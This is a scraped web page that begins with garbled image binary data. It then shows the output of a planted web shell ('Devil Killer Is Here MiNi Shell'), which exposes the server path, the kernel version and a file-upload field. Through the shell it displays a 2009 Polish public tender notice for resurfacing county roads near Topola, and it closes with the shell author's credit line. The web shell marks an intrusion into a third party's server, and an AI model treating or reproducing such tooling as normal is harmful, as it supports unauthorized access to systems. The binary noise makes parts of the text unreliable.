JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/129121-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: REMONT NAWIERZCHNI BITUMICZNEJ DRÓG POWIATOWYCH NR 3180D ORAZ NR 3193D W M. TOPOLA</b><br>
<b>Numer ogłoszenia: 129121 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Daleka 19, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8151657, faks 074 8153541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.zabkowice.dsw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT NAWIERZCHNI BITUMICZNEJ DRÓG POWIATOWYCH NR 3180D ORAZ NR 3193D W M. TOPOLA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie robót związanych z remontem dróg powiatowych nr 3180 D km. 3+721-4+621 oraz drogi nr 3193 D km.11+711 - 12+201  o łącznej długość 1390 mb.  m. TOPOLA.    
 STAN ISTNIEJĄCY:
Istniejąca nawierzchnia jest w złym stanie technicznym charakteryzująca się licznymi spękaniami, koleinami miejscami po remontach cząstkowych. Liczne rakowiny w połączeniu z w/w nieprawidłowościami powodują jej bardzo szybką  degradację stwarzając tym samym zagrożenie dla ruch kołowego i pieszego.
ZAKRES PLANOWANYCH ROBÓT: 
- wyrównanie istniejącej nawierzchni bitumicznej mieszanką mineralno asfaltową średniej grubości 2 cm po zagęszczeniu co odpowiada średnio wbudowaniu masy w ilości 50 kg. na m2.
- wykonanie warstwy ścieralnej z mieszanki mineralno asfaltowej grubości 4 cm. po zagęszczeniu. W miejscu połączenia z drogą powiatową nawierzchnię drogi powiatowej  należy na odpowiedniej długości rozebrać lub sfrezować w celu uzyskania odpowiedniego profilu podłużnego i poprzecznego.
-.na zjazdach należy wykonać nową warstwę konstrukcyjną wraz z ułożeniem na niej warstwy ścieralnej grubości jak na nawierzchni  -  szerokość  1,0 m.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział Wykonawcy, którzy:1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień . 2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 2.1.Wykażą , że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy ( w tym okresie) wykonał co najmniej 2 zadania o zakresie minimum -10.000,00 m2 wykonania remontu nawierzchni bitumicznych drogi każde lub zadania o charakterze porównywalnym z zakresem przedmiotu zamówienia. 2.2.Dysponują osobą posiadającą uprawnienia kierownika budowy dla branży drogowej , która posiada aktualne zaświadczenie o przynależności do odpowiedniego samorządu zawodowego lub przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia osoby posiadającej wymagane uprawnienia i która jest członkiem właściwego samorządu zawodowego. 3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 i 2 Ustawy Prawo Zamówień Publicznych z dn.29-01-2004r (Dz.U. Nr 223 poz.1655 z 2007r z póź.zm.). Zamawiający dokona oceny spełnienia warunków na podstawie analizy dokumentów dołączonych do oferty, które zostały określone w Specyfikacji istotnych warunków zamówienia zgodnie z formułą : spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Złoży pisemne oświadczenie ,że spełnienia warunki określone w Art.22 ust.1 ustawy Prawo zamówień publicznych z dn.29-01-2004r. (Dz. U. Nr 223 poz.1655 z 2007r z póź.zm.) wg. wzoru zał. nr 2, 2.Przedłoży aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. / oryginał lub kopię poświadczoną za zgodność z oryginałem przez Wykonawcę /.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej , zamiast dokumentów wymienionych składa dokument lub dokumenty zgodnie z par.2 Rozporządzenia Prezesa Rady Ministrów z dn. 19-05-2006r w sprawie dokumentów , jakie może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mają być składane ( Dz.U. Nr 87 poz.605). 3.Doświadczenie zawodowe- wg wzoru zał. nr 3,Wykazać wykonanie co najmniej 2 zadań o zakresie minimum -10.000,00 m2 wykonania remontu nawierzchni o technologii jak w przedmiocie zamówieniu lub technologii porównywalnej z zakresem przedmiotu zamówienia z podaniem daty , nazwy i adresu zamawiającego oraz załączyć dokumenty potwierdzające , że zostały wykonane z należytą starannością - oryginały lub kopie potwierdzone za zgodność z oryginałem przez Wykonawcę . 4.Załączyć wykaz imienny osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia wg wzoru. ZAŁĄCZNIK NR 4.Wskazana na kierownika budowy osoba winna posiadać wymagane uprawnienia budowlane dla branży drogowej oraz posiadać aktualne zaświadczenie o przynależności do odpowiedniego samorządu zawodowego. W celu potwierdzenia przygotowania zawodowego do pełnienia funkcji Kierownika budowy należy załączyć dokumenty potwierdzające posiadanie przygotowanie zawodowe - wymagane uprawnienia budowlane kierownika budowy dla branży drogowej oraz aktualne zaświadczenie o przynależności do odpowiedniego samorządu zawodowego oryginały lub kopie potwierdzone za zgodność z oryginałem przez Wykonawcę.W przypadku podania w wykazie osób , którymi Wykonawca będzie dysponował, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia załączając w/w wymagane dokumenty. 5.Przedłoży zaakceptowany Projekt umowy. 6.Załączy pełnomocnictwo do reprezentowania Wykonawcy w przypadku, gdy dokumenty składające się na ofertę, podpisuje osoba nie będąca ustawowym przedstawicielem Wykonawcy (nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej) poświadczone notarialnie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarciu umowy w sprawie niniejszego zamówienia zgodnie z art. 23 w/w ustawy. Pełnomocnictwo winno być zgodne z przepisami Kodeksu Cywilnego oryginał lub kopia potwierdzona notarialnie . 7.Złoży pisemne oświadczenie,że spełnienia warunki udziału w postępowaniu Art.44 ustawy z dn.29-01-2004r.Prawo zamówień publicznych (Dz.U. Nr 223 poz.1655 z 2007r z póź. zm.) wg wzoru zał.nr 1. Przedłożone dokumenty winny spełniać wymogi określone w Specyfikacji istotnych warunków zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.zabkowice.dsw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, 57-200 Ząbkowice Śl. ,ul.Daleka nr 19, pokój nr 10 od poniedziałku do piątku w dni robocze w godz.7:30 do 14:30 po uprzednim uzgodnieniu.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 08:45, miejsce: Zarząd Dróg Powiatowych, 57-200 Ząbkowice Śl. ,ul.Daleka nr 19, pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com